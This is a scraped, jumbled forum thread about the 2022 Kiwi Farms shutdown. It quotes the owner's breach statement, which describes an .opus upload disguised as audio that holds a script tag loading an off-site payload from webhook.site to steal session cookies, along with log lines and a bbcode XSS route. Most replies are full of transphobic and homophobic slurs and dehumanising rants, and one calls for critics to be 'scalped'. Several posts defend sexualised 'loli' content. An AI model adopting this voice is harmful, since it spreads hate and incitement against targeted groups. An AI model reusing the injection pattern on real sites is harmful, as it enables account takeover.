Those evil fucking parasites just don’t know when to stop.Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
Hacked? Did they change what it says or delete threads? Do you have a screencap?Site hacked, tor down and now the troon mafia is attacking any other means null has to fight back yet the fucking lemming retard masses cheer in favor of all of this, supporting the fag who wants to convince your 6 YEAR OLD SON to cut off his dick, grow tits, put on panties and dance in front of middle aged guys in speedos. I already had a negative opinion of 99% of humanity but this cements that'll never change.
literally just go to kiwifarms.netHacked? Did they change what it says or delete threads? Do you have a screencap?
I highly recommend this. The little privacy advice he gives is pretty solid and should be taken seriously if you value privacy. Added to that I would also recommend to check out https://www.privacytools.io/literally just go to kiwifarms.net
josh explained everything there
The forum was hacked. You should assume the following.
- Assume your password for the Kiwi Farms has been stolen.
- Assume your email has been leaked.
- Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager
Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.
Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.
XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count
The script was uploaded to XenForo directly (as XenForo does not validate media),
XenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.
Did he stop using poast?If Null hadn't proven to be an utterly useless fagaloon on Poast, I would have been willing to forgive the BS. But he simply claimed it was a handful of bad actors (Jack Awful and the like) before going "kys pedo", proving that it wasn't just "a few bad actors". His group of shit-brained slacktivists like "I hope they post CSEM" Procrastinhater can burn for all I care.
Did he stop using poast?
I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.literally just go to kiwifarms.net
josh explained everything there
Heres the text that was posted if you want it:I clicked too late to see the letter. It's only an animated video when I found this post. I didn't know it ever changed from the teacup thing. Okay it looks like the clearnet domain is up rn.
Site Breach
User Impact Statement
The forum was hacked. You should assume the following.
Assume your password for the Kiwi Farms has been stolen.
Assume your email has been leaked.
Assume any IP you've used on your Kiwi Farms account in the last month has been leaked.
Thankfully, most users pay attention to my privacy checkups and there isn't much to leak.
You should take a moment to read privacyguides.org, even if you hate this site. Use an email address from a reputable provider. Never use the same password. Use a passphrase with a password manager suggested on PrivacyGuides. Use email aliases instead of burner emails so you keep access to your accounts without risking your privacy.
I do not know for sure if any user information was leaked. In my access logs, they attempted to download all user records at once. This caused an error and no output was returned. I shut everything off soon after. If they scraped information through some other mechanism, I cannot say with any confidence either way.
Prognosis
The site will be restored from a backup point taken at September 17th at Noon GMT.
This will not happen immediately. I need to reformat and reinstall everything. I need to completely evaluate my security from the top down.
Cloudflare not only provided DDoS protection, they also accounted for many popular exploits like this. As I've worked for weeks to combat the endless flow of attacks from every conceivable angle I have spread myself very thin and hurridly replaced old systems with new ones that are not properly vetted.
Even now, the many groups which have organized to terrorize businesses and attack the servers are looking for new opportunities to complicate our situation.
I am very, very tired of writing statements like this, but I find it difficult the stifle my righteous indignation. Every time I see the reaction of these people, it is this hideous arrogance. I am so filled with utter revulsion at the thought of letting smug, dangerous perverts get away with hiding who they are from the public.
More than anything, I really miss spending time with you guys and laughing at stupid shit. It is very draining to deal with such miserable people all the time.
Technical Explanation
Yesterday, vsys - one of our hosts out of Ukraine - was compromised. I initially believed that this allowed a hacker to take over that webserver and snoop data as a man-in-the-middle. I no longer believe that is the case.
A bad actor was able to upload a webpage disguised as an audio file to XenForo. Elsewhere, he was able to load this webpage (probably as an inline frame), causing random users to make automated requests and send their authentication cookies off-site, so that the attacker could use it to gain access to their account. My admin account was compromised through this mechanism.
Once they had access to the ACP, they attempted to download user data, and XenForo provides a way to export user lists with information that is precisely: email, username, last acitivity, register date, user state (banned/unverified), post count, and if they are staff.
However, their request did not appear to go through because they requested too many records at once. The following record reports a 500 error and no content.
2a03:e600:100::31 - - [18/Sep/2022:08:16:13 +0000] "GET /admin.php?users/list-export&export=1 HTTP/2.0" 500 0 "https://kiwifarms.st/admin.php?users/list" "Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0"
It's impossible to say if they acquired user data through other means, but I did not see any other attempt to complete this transaction or otherwise scrape user data.
The file uploaded was an .opus file that contained a web document that looked like this.
<!DOCTYPE html>
<script src=//webhook.site/payload-url></script>
I do not know what was in the payload. The webhook site allows for you to redirect to other scripts and to delete request history, which was done. There's no information tied to that page.
The script caused the user to load /test-chat, my chat shim, /help/, XenForo's help documentation, /avatar/avatar, to change their avatar to the logo of another site (likely as a frame job), and admin.php?tools/phpinfo, if they were an admin.
The script was uploaded to XenForo directly (as XenForo does not validate media), but injected by my custom Rust-based chat program that interacts with XenForo and borrows sessions.
x.x.x.x - - [18/Sep/2022:03:03:53 -0400] "GET /data/audio/xxxx/xxxx.opus HTTP/1.1" 200 90 "https://kiwifarms.st/test-chat?style=dark" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
You can find relevant scripts below.
ruforo/src/bin/xf_chat/main.rs at master · jaw-sh/ruforo
Contribute to jaw-sh/ruforo development by creating an account on GitHub.github.comruforo/resources/js/chat.js at master · jaw-sh/ruforo
Contribute to jaw-sh/ruforo development by creating an account on GitHub.github.comXenForo removed us from their license a year ago and their software is no longer sufficient for our needs. We needed something custom, but my confidence in my work has been shot.ruforo/src/bbcode at master · jaw-sh/ruforo
Contribute to jaw-sh/ruforo development by creating an account on GitHub.github.com
The sophistication in this attack is very high, and shows an intimiate familiarity with both Rust and XenForo. It is unfortunate that they have applied themselves to this end, likely for pay.
There are so many more people trying to destroy than create.
Take it easy,
Josh
<[email protected]>
P.S. I am still expecting to have to deal with that family emergency. If that happens, I will be gone for a while. Updates will be on t.me/s/kiwifarms.
Update Sep-19: XSS Injection Found
There were two possible ways to inject an inframe into the chat html, one by usingCode:tags, and another by malforming an opening tag, like [b<tag>]. Thank you to the three anonymous people who submitted this information. [/QUOTE]
If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.It is very draining to deal with such miserable people all the time.
Considering the fact that they like to stir up crap everywhere even to those who'll take them in I wouldn't be surprised if they tried to make enemies with DDOS-guard as well. Not to take anything bad from the good they do do but they simply are not most amicable people and like to stir up drama to their allies to say it lightly.It's incredibly depressing to see what's happening to KF rn.
Their .ru domain even got pulled, which is absolutely insane.
DDoS-Guard dropped them last I checked. The fucking guys who'll host hamas, have dropped KFs.
This isn't the end of it (I hope), and I'm sure people will move on as they do with the 24 Hour news cycle, and hopefully KiwiFarms will regain some of their security and infrastructure. Josh has made it through before and I'm sure he'll come through again.
You can find Josh's statement here (TOR link).
Lets hope this isn't the last we hear from KF.
Even if you don't like what KF does, it's users, or what they talk about, if you don't see what a horrifying signal this is for the future of the internet you're a fucking retard.
Anyone celebrating what happened to them needs to be scalped.
There used to be a really good null thread on a kiwi farms splinter site called lolcow dot org and he was really into neko shota when he was younger apparently.If that isn't the pot calling the kettle black, I'll eat my fucking hat. This is why Null lost my respect, letting his goddamn moronic tards get away with their BS, claiming "it was only a few bad actors" and then proceeding to prove it wasn't just "a few bad actors". The fact this shirtbird cares more about malding and seething over drawings than actual fucking kiddie diddlers told me everything I needed to know about them.
On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.Is varshhangout pro kiwi farms?
Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.On principle. Varis is pro-freedom of speech and expression whether is controversial art like loli or unpopular opinions like those found on the kiwifarms so on that aspect most of us are not happy with the censorship of the farms.
On a personal level, it varies, some like them for standing against the mainstream ideologies.
While others, me included admittedly, dislike them for their, frankly miopic view on anime.
If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.Well I guess I should make my center left political views known then. Is there a way to post a bio on my profile. I'm still relatively new.
For the record, I think kiwi farms was a cess pool of retarded, freakish alt-right incels who's cancerous activities were nothing short of terrorism. And I highly praise Keffals for her successful campaign in shutting down there freakish site. I came here to engage with weebs, lolicons and social outcasts. Not far right cyber bullies. Hopefully those aren't the kind of people that lark here.
i follow a logic : if they can censor someone , 1 day they can do that at me event what i say/did is still legal.If you like lolis then you should be in favor of free speech, even for people you disagree with. Otherwise you can't complain when it is you on the receiving end of censorship.